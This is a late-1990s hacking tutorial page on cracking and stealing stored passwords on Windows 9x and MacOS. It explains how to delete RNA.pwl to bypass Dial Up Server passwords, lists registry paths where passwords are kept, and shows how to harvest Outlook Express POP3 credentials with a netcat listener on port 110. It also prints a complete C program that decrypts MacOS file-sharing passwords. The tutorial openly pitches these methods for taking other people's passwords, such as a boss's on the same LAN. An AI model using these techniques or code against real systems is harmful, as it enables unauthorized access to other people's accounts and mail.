Password
Cracking Decrypted 3
PAGE
1, 2,
3
More Password Cracking Decrypted
Bypassing the Dial Up Server Password
Those of you who have used File Sharing, must certainly have heard about the Dial Up Server software or utility. Now, this too can be password protected. Now, say you have password protected the Dial Up Server, and have forgotten it or someone has changed it, then no one can dial into your system. What do you do?
Like all password protection features in Win 9x systems, this too can easily be bypassed or changed. You do not need to know the previous old password to perform this hack. Simply delete the file RNA.pwl file in the c:\windows directory and the next time you use Dial Up Server, you will find that it will either ask you to enter a new password or simply not ask for a password at all.
Cracking Outlook Express’s Password
After I released the first edition of - Password Cracking Decrypted Revisited, I got a lot of mails, from people asking me questions, like where Outlook Express stores the Dial Up Password and how to decrypt it or how to get the Outlook Express password of my boss, who is on the same LAN. Well, this edition will to a certain extend answer all such questions.
Outlook Express too like Internet Explorer and a number of other Dial Up Software, provides the user with the option of ‘Save Password.’ This option although it makes connecting to the net easy, is really a stupid security loophole and makes the password of the User vulnerable to being cracked.
Outlook Express stores the Dial Up Networking or DUN Password in the registry, under the following key:
HKEY_CURRENT_USER\Software\Microsoft \Internet Account Manager\Accounts
Well, actually the above key has a number of sub keys, which correspond to and store information on various Internet Connection Accounts. The Accounts (information and configuration details) are stored as 00000001 for the first account, 00000003 for the third and so on.
Clicking on any of these Accounts Key, will display a number of DWORD, String and Binary values in the right pane. All these values store configuration details about how your Internet Connection Account works. However, the key with which we are really interested is only the: POP3 Password2 key.
The POP3 Password2 is the DWORD value, which stores your Internet Connection Password. Actually, it is not Outlook only, which uses, this key, but the Internet Connection Wizard, under which both Outlook and Internet Explorer come.
Anyway, now, once I did find out the key of Outlook express, I racked my brains to figure out the algorithm to decrypt the password so as to get the plaintext one, but somewhere along the way, when I was experimenting for another of my tutorials, I found out a way which would be much more easier, to get the Outlook Password. It requires no coding, no fancy C code editing and has no Mathematics of algorithms involved.
************************
HACKING TRUTH: Common paths where some passwords are stored by various applications-:
Outlook Express / Internet Explorer ---
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
Panda Antivirus: HKEY_LOCAL_MACHINE\SOFTWARE\Panda Software\Panda Antivirus 6.0
Shares: HKEY_LOCAL_MACHINE\SOFTWARE\
Microsoft\NetDDE
Screen Saver: c:\windows\user.dat
************************
Well, before we go on to the actual process, let us understand what Outlook usually does, while connecting to your mail server and downloading your email. Now, when you click on Send and Receive, Outlook Express connects to Port 110 of your Mail server and the following set of POP command exchange takes place between your system and the POP daemon of the mail server:
+OK QPOP (version 2.53) at delhi1.mtnl.net.in starting.
USER abhijit
+OK Password required for abhijit
PASS abc
+OK abhijit has xx messages (yyyyy octets).
So, this means that firstly, as soon as the daemon banner, comes up, Outlook sends your Username to the mail server, then once the Password required Message, comes up, Outlook sends your password. This in turn means that your password is being sent to the remote system and (I am sure, almost all of you have guessed it by now) if this remote system has a port listener installed, then you can get both the User name and Password.
So what you have to do is:
1.) Change Outlook Express’s Mail Server setting to point to almost always a local machine or a machine where you are able to install and run a port listener.
2.) Connect to the Internet and click on Send/Receive just as you normally do, and voila, the listener, gets the password for you. It is as simple as that.
This technique works with almost all email clients including Netscape Messenger. It will not work only with those clients, which ask for a password for you to be able to change the mail server settings.
Where do I get a Port Listener? Well, you can them as well as all the Hacking utility you need from either http://www.anticode.com/ or packetstorm.securify.com
Now, say you do not want to run the above program or somehow do not like the idea of working with port listener, then, you can use a very interesting tool by L0pht.com called Netcat. This tool is really very amazing and before you read this manual further, I suggest you read its documentation at l0pht.com as I will not be discussing it’s various interesting options in this manual.
Anyway, the following command will create a simple Port Listener sort of utility, which will listen to the specified port and will record all data sent to it, in the log file specified.
C:\>nc –l –p xx > file
Where xx is the port number, which has to be listened, and file is the path of log file, where all keystrokes or everything entered by the person who connected to Port xx are recorded.
Note: The ‘-l’ option listens for connections, while ‘-p xx’ is used to specify the port to which you want Netcat to bind to.
Now, in our case, we want to bind Netcat to Port 110, listen for connections and record all keystrokes, so we use the following command:
C:\>nc –l –p 110 > log.txt
Well, actually all methods described in this method to steal the passwords stored by those software which have the ‘Save Password’ feature are not really needed. Almost all password including, Windows Login, Outlook Express, DUN and a few others will easily get unmasked, by using programs, like: Revelation
Such a program will basically convert the ‘ *’s to plaintext. You can get it at: Revelation.
Cracking the MacOS Password
The following piece of code demonstrates the working of the algorithm used by MacOS to encrypt password and also how to decrypt such passwords. So Enjoy!!!!
/*
macfspwd.c
Written by Nate Pierce
[email protected]
http://happiness.dhs.org
July 14, 1999
Algorithm taken from:
http://www.securityfocus.com/vdb/
bottom.html?section=discussion&vid=519
I have tested this on 8.6 and it works fine as well.
Compiled quite peachily on linux 2.2.10 with:
g++ -o macfspwd macfspwd.c
Run example (with debug on):
[user@server user]$ ./macfspwd 000406180D0A190B
Original string: 00 04 06 18 0d 0a 19 0b
1st XOR string: 00 00 04 06 18 0d 0a 19
2nd XOR string: 73 70 63 67 74 70 72 6b
Password is: stayaway
----- from the url above -----
The encryption algorithm in MacOS system is simple and the password can be easily
decoded.
Password is stored in Users & Groups Data File in Preferences folder. Offset is different on
each system and depends on Users & Groups configuration, but it always lie after owner's
username. It's not so difficult to find it using a hex editor, even if we don't know owner's
username.
Here are some examples of encrypted passwords:
00 04 06 18 0D 0A 19 0B = stayaway
0A 1F 10 1B 00 07 75 1E = yellow
1C 1B 16 14 12 62 10 7B = owner
07 02 13 1A 1E 0F 1A 14 = turnpage
27 25 33 27 27 39 24 7E = Trustno1
AA BB CC DD EE FF GG HH = aa bb cc dd ee ff gg hh
where:
AA BB CC DD EE FF GG HH - encrypted password (hex)
aa bb cc dd ee ff gg hh - decrypted password in ASCII codes (hex)
aa=AA XOR 73H
bb=BB XOR AA XOR 70H
cc=CC XOR BB XOR 63H
dd=DD XOR CC XOR 67H
ee=EE XOR DD XOR 74H
ff=FF XOR EE XOR 70H
gg=GG XOR FF XOR 72H
hh=HH XOR GG XOR 6BH
An example:
Let's take OO 04 06 18 0D 0A 19 0B
00H XOR 73H = 73H = s
04H XOR 00H = 04H; 04H XOR 70H = 74H = t
06H XOR 04H = 02H; O2H XOR 63H = 61H = a
18H XOR 06H = 1EH; 1EH XOR 67H = 79H = y
0DH XOR 18H = 15H; 15H XOR 74H = 61H = a
0AH XOR 0DH = 07H; 07H XOR 70H = 77H = w
19H XOR 0AH = 13H; 13H XOR 72H = 61H = a
0BH XOR 19H = 12H; 12H XOR 6BH = 79H = y
tested on:
MacOS 7.5.3, 7.5.5, 8.1, 8.5.
copied verbatim from a post to bugtraq by Dawid adix Adamski <[email protected]> on
July 10, 1999
----- snip -----
*/
#include<iostream.h>
#include<iomanip.h>
#include<fstream.h>
#include<string.h>
/* comment this out if don't want to see the extra info */
#define DEBUG
/* I think the max password length for file sharing is 8 characters */
#define PWLEN 8
int hexdig(char q);
/* returns decimal equiv if q is 0-9, a-f, or A-F */
int hexint(char p,char q);
/* returns value of 2 digits spliced together - hexint(15,15) will return 255 */
int main(int argc, char *argv[]){
int s1[10],s2[10],s3[10],i;
char pwd[PWLEN+1];
/* first string - try 000406180D0A190B */
if(argc>1){
for(i=0;i<strlen(argv[argc-1]);i+=2){
if(hexdig(argv[argc-1][i])&&hexdig(argv[argc-1]
[i+1]))s1[i/2]=hexint(argv[argc-1][i]
,argv[argc-1][i+1]);
else{
cout<<"\nError: last argument should be a 16 digit hex number! (no spaces please)\n";
return 1;
}
}
}
/* chunk in 2nd XOR string - based on the string from the file*/
s2[0]=0x0;
for(i=0;i<PWLEN-1;i++){
s2[i+1]=s1[i];
}
/* chunk in final XOR string - this is constant */
s3[0]=0x73;
s3[1]=0x70;
s3[2]=0x63;
s3[3]=0x67;
s3[4]=0x74;
s3[5]=0x70;
s3[6]=0x72;
s3[7]=0x6B;
#ifdef DEBUG
cout<<"Original string: ";
for(i=0;i<PWLEN;i++){
if(s1[i]<0x10)cout<<"0";
cout<<hex<<s1[i]<<" ";
}
cout<<"\n1st XOR string: ";
cout<<"00 ";
for(i=0;i<PWLEN-1;i++){
if(s2[i+1]<0x10)cout<<"0";
cout<<hex<<s2[i+1]<<" ";
}
cout<<"\n2nd XOR string: ";
for(i=0;i<PWLEN;i++){
if(s3[i]<0x10)cout<<"0";
cout<<hex<<s3[i]<<" ";
}
cout<<endl;
#endif
cout<<"Password is: ";
for(i=0;i<PWLEN;i++)pwd[i]=s1[i]^s2[i]^s3[i];
pwd[PWLEN]=0x0;
cout<<pwd<<endl;
return 0;
}
int hexdig(char q){
if(q>47 && q<58)return 48;
if(q>64 && q<71)return 55;
if(q>96 && q<103)return 87;
return 0;
}
int hexint(char p,char q){
return 16*(p-hexdig(p))+(q-hexdig(q));
}
-------------------------
Well, that is all for now, I will update this manual explaining how to crack more passwords very very soon, so hang in there.
PAGE
1, 2,
3
TOP |
